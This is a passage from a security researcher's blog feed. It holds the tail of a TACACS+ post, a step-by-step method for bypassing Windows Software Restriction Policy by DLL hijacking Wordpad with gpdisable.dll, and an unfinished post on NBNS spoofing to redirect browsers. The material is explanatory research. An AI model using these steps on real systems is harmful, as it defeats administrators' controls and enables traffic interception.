Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
<br />
In my opinion, the TACACS+ protocol does not give a necessary level of protection against MitM attacks nowadays. <br /><br />On the other hand, sometimes it’s hard to perform all of these attacks due to the fact of Cisco’s recommendation to locate a TACACS+ server in a special management VLAN (it is accessible only for admins and network devices). Of course, there are ways to penetrate to a management VLAN, but it’s another task. </div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-45674379530531424342015-08-09T08:18:00.002-07:002015-08-09T08:18:31.882-07:00Universal way to bypass Group Policy (SRP) by Limited User<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="the-post-content the-post-content-page">
<i>(It's the post from July 2011)</i><br />
<br />
What is it? Group policy is a powerful feature of Windows OS.<br />
From wiki: “Group Policy is a set of rules which control the working
environment of user accounts and computer accounts. Group Policy
provides the centralized management and configuration of operating
systems, applications and users' settings in an Active Directory
environment“<br />
<br /><span id="more-3008"></span>
For example, it can block users’ access to Regedit or IE proxy
changing. So it is additional limits for users, besides file system and
other permissions.
One of the main parts of Group Policy is represented by Software
Restriction Policy (SRP). Administrator can set a little list of
software which can be run by limited user with SRP.
Therefore, SRP can level up security of whole system by restricting
user’s rights.<br />
<br />
<h3 style="text-align: left;">
<span style="font-weight: bold;">How does it work?</span> </h3>
When a user launches a process it’s the parent process that checks SRP
to see if the execution of the child should be allowed or blocked. The
parent process uses NtQueryValueKey to query the Registry value <span style="font-style: italic;">HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled</span>, which if present and non-zero indicates that SRP is turned on.<br />
<br />
<h3 style="text-align: left;">
<span style="font-weight: bold;">How can we bypass it?</span> </h3>
There are few different ways.
Their main idea is that SRP check is situated in user space. A parent
process is owned by a limited user. Therefore, a user can bypass SRP by
different memory manipulations.<br />
<br />
<h3 style="text-align: left;">
<span style="font-weight: bold;">Attack!</span></h3>
Marc Russinovich posted a great tool – Gpdisable and a good explanation of SRP on <a href="http://blogs.technet.com/markrussinovich/archive/2005/12/12/circumventing-group-policy-as-a-limited-user.aspx">his blog</a>. Gpdisable is now unavailable, but it can be found in <a href="http://web.archive.org/web/20061231193919/http://www.sysinternals.com/files/gpdisable.zip">Internet</a>
Gpdisable uses dll-injection techniques, to inject into a parent process
memory. Then “it fools the SRP code by returning an error value”, when
SRP tries to query TransparentEnabled. Therefore, a parent process can
run any other process.<br />
<br />
<h3 style="text-align: left;">
<span style="font-weight: bold;">Problem.</span> </h3>
Gpdisable consists of 2 files – gpdisable.exe and gpdisable.dll.
gpdisable.exe – inject DLL into process.
gpdisable.dll – DLL for bypassing SRP.
But in real life, there is a problem - to inject gpdisable.dll. Because
in a good restricted system a user has access to run only software from
white list. So you should run gpdisable.exe, but you don’t have right to
do it.<br />
<br />
<h3 style="text-align: left;">
<strong>Real Attack!</strong> <i></i></h3>
When I read about binary planting, I’ve got an idea how we can inject
gpdisable.dll in process. It’s simple – dll-hijacking. But almost all
big software (like MS Word, Excel and Notepad :) doesn’t have such
vulnerabilities. That’s bad.
But if we use "advanced" dll-hijacking (COM server-based binary
planting), we can do it almost of all software. I won’t retell an idea
of such binary planting, but you can get it from <a href="http://blog.acrossecurity.com/">Acros Security Blog</a>.<br />
<br />
Steps to bypass SRP for XP:<br />
<ul>
<li>rename gpdisable.dll to deskpan.dll;</li>
<li>create a new folder and name it as files.{42071714-76d4-11d1-8b24-00a0c9068ff3};</li>
<li>place deskpan.dll to the new folder;</li>
<li>open the folder;</li>
<li>create a new rich text document in the folder;</li>
<li>double-click the rich-text document.</li>
<li>Wordpad runs with gpdisable.dll</li>
<li>Bypassed :) We can run any process.</li>
</ul>
<br />
There are similar steps for Windows Vista/7 and others.
In addition, all that steps we can do from “Open” or “Save As” dialogue, that can be useful for Citrix systems.<br />
<br />
Thanks to <a href="https://twitter.com/fitblip">Ryan Sears</a>.<br />
And thank you, for your attention.
<a href="https://twitter.com/antyurin">Alexey Tyurin</a><br />
</div>
</div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-11101076367570317112015-08-09T07:40:00.000-07:002015-08-09T08:18:54.712-07:00NetBIOS spoofing for attacks on browser<div dir="ltr" style="text-align: left;" trbidi="on">
<i>(It's the post from January 2012)</i><br />
Sometime ago during pentest NetBIOS protocol got my attention. Especially, NetBIOS naming and its co-work with DNS.<br />
NetBIOS
is an old protocol, distributed world-wide, but it doesn’t have many
security mechanisms. And I think that many interesting things are born
in different technologies’ interception. So I started a little research
and I want to show some results of it.<br />
<br />
<h3 style="text-align: left;">
<span style="font-weight: bold;">NetBIOS Intro</span></h3>
When
I got into the NetBIOS-protocol, I’ve got an idea to create a
Metasploit module to perform NBNS-spoofing, but Tim Medin passes ahead
of me :) Almost a year ago, he created that module
(auxiliary/spoof/nbns/nbns_response). In addition, he wrote a great post
about using of <a href="http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html">NBNS-spoofing for NTLM-relay attack</a>. A bit later I’ll add his trick to SMBRelay Bible, if he accepts it :)<br />
Then I tried to improve his ideas…<br />
<br />
<h3 style="text-align: left;">
Old Tricks </h3>
<div style="text-align: left;">
Tim wrote two interesting details.<br />
The first is a sequence of resolution IP-addresses in Windows OS:<br />
1) local hosts file - C:\Windows\System32\drivers\etc\hosts<br />
2) DNS<br />
3) NetBIOS Name Service<br />
<br />
<span style="background-color: white;">Secondly,
all modern browsers have “intelligent address bar”. This bar is used as
address bar and as a search bar at the same time.</span> When a user enters a
word in it, a browser tries to access a host with such name and only
then it tries to search this word.<br />
For example, if I enter “dsecrg”
in address bar of my browser, it tries to get IP-address of “dsecrg” by
DNS, then by NetBIOS Name Service and after all “dsecrg” is gone to
default search engine.<i></i></div>
<div style="text-align: left;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuYBP0aaiEDXSjaXma9W0e8x6GhlgjvDzM3uiIgIYY0LWB2iGfFlIHA7z0_76_vQGVN_qvSn5vEfTvrBU_AxaYq7tJC2X9_qYr7nRNtyL2uvndawnewevET6y-G2akuMbl-ppycwGE-_MF/s1600/bing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuYBP0aaiEDXSjaXma9W0e8x6GhlgjvDzM3uiIgIYY0LWB2iGfFlIHA7z0_76_vQGVN_qvSn5vEfTvrBU_AxaYq7tJC2X9_qYr7nRNtyL2uvndawnewevET6y-G2akuMbl-ppycwGE-_MF/s320/bing.jpg" width="320" /></a></div>
<br />
<div style="text-align: left;">
<i></i></div>
<br />
<br />
<div style="text-align: left;">
<i></i></div>
<div style="text-align: left;">
Therefore,
we can use a NBNS-spoofing attack and send reply with our IP-address to
user’s browser, when it tries to resolve “dsecrg” by NBNS. Then user’s
browser connects to our web-server.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
<span style="font-weight: bold;">New Tricks</span></h3>
<div style="text-align: left;">
But let’s go forward. As we can see, if Windows can’t perform IP-resolution via DNS, it tries NBNS.<br />
And what will be if we try to connect to aaa.google.com?</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXyPezASOUIl0DrmF-p6GHXvZGeRwDS7ksBZ87-ITDntvyeS2YCB5UOScaqA-RFXmqT9JOIvRRbVUxqJmGBduztMMKLEO6WTPeZi2YA59btmmhlNP3BZzpjSWTfCaW0jhnVos2UEpTtBN4/s1600/google.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXyPezASOUIl0DrmF-p6GHXvZGeRwDS7ksBZ87-ITDntvyeS2YCB5UOScaqA-RFXmqT9JOIvRRbVUxqJmGBduztMMKLEO6WTPeZi2YA59btmmhlNP3BZzpjSWTfCaW0jhnVos2UEpTtBN4/s320/google.JPG" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
There
is analogue situation. DNS is the first, NBNS is the second… And we can
spoof Internet addresses! So, there we have that NBNS-spoofing is
analogue to DNS-spoofing.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Is NBNS-spoofing attack better than DNS-spoofing?<br />
No, it is not. Because NBNS-spoofing attack has some rough limitations:<br />
1) It works only in local networks<br />
2) It has hostname length limitation (15 characters)<br />
3)
It can spoof only hostnames which DNS can’t resolve. But we can bypass
this limitation, if we can make DoS attack on DNS server.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="background-color: white;">By the
